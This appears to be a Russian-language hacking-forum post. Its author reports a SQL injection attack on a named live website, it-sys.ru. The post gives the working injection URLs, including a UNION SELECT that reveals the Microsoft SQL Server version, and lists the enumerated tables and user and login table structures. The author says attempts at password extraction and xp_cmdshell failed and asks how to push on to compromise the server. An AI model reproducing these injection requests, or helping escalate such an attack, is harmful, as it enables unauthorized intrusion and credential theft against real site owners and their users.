Адрес:
Код:
http://www.it-sys.ru/itsys.cgi?id=-12+'
Пашет на:
Код:
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.it-sys.ru/itsys.cgi?id=-12+union+ALL+select+null,null,null,@@version,null, null,null
Есть следующие таблицы:
Код:
Banners
BottomString
Counters
Currency
dtproperties
Feedback
Menu
Price
PriceCategories
PricePoints
RightMenu
sysconstraints
syssegments
UpperString
узнавать структуру не стал — не интересно, а вот другие таблицы порыл:
Код:
Users(Id, Name, Permissions)
master..syslogins(constid, id, colid, spare1, status, actions, error)
SysUsers(uid, status, name, sid, roles, createdate, updatedate, altuid, password, gid, environ, hasdbaccess, islogin, isntname, isntgroup, isntuser, issqluser, isaliased, issqlrole, isapprole)
USER = dbo
Пароль на базу хранится как-то странно — в общем не смог его извлечь.
На большее знаний не хватило
Я совсем зелёный в sql-inj.
Заюзать xp_cmdshell (да и BULK INSERT тоже) не получилось, потому и спрашиваю: как прорваться дальше на тачку?